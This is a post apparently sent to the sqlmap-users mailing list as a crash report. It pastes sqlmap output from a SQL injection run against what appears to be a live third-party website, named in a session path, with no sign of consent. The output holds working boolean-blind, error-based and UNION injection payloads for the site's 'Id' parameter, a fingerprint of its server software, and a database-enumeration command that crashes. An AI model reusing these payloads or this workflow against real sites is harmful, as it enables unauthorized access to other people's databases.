[sqlmap-users] 16:27:54] [CRITICAL] error report dont know if allready patched...

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Authors assume no liability and
are not responsible for any misuse or damage caused by this program

[*] starting at 16:27:50

[16:27:50] [INFO] using 'C:\Users\Admin\Desktop\sqlmap\output\
www.dtvthai.com\session' as session file

[16:27:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[16:27:50] [INFO] testing connection to the target url

[16:27:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: Id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=3) AND 4216=4216 AND (6256=6256

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: Id=3) AND (SELECT 2258 FROM(SELECT
COUNT(*),CONCAT(0x3a656c643a,(SELECT (CASE WHEN (2258=2258) THEN 1 ELSE 0
END)),0x3a6a6a643a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3553=3553

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: Id=3) LIMIT 1,1 UNION ALL SELECT NULL,
CONCAT(0x3a656c643a,0x5877664a584155517a56,0x3a6a6a643a), NULL, NULL, NULL#
---

[16:27:54] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD or Linux FreeBSD 7.3
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0

[16:27:54] [INFO] fetching database names

[16:27:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: C:\Users\Admin\Desktop\sqlmap\sqlmap.py -u
******************************* --dbs
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)

[*] shutting down at 16:27:54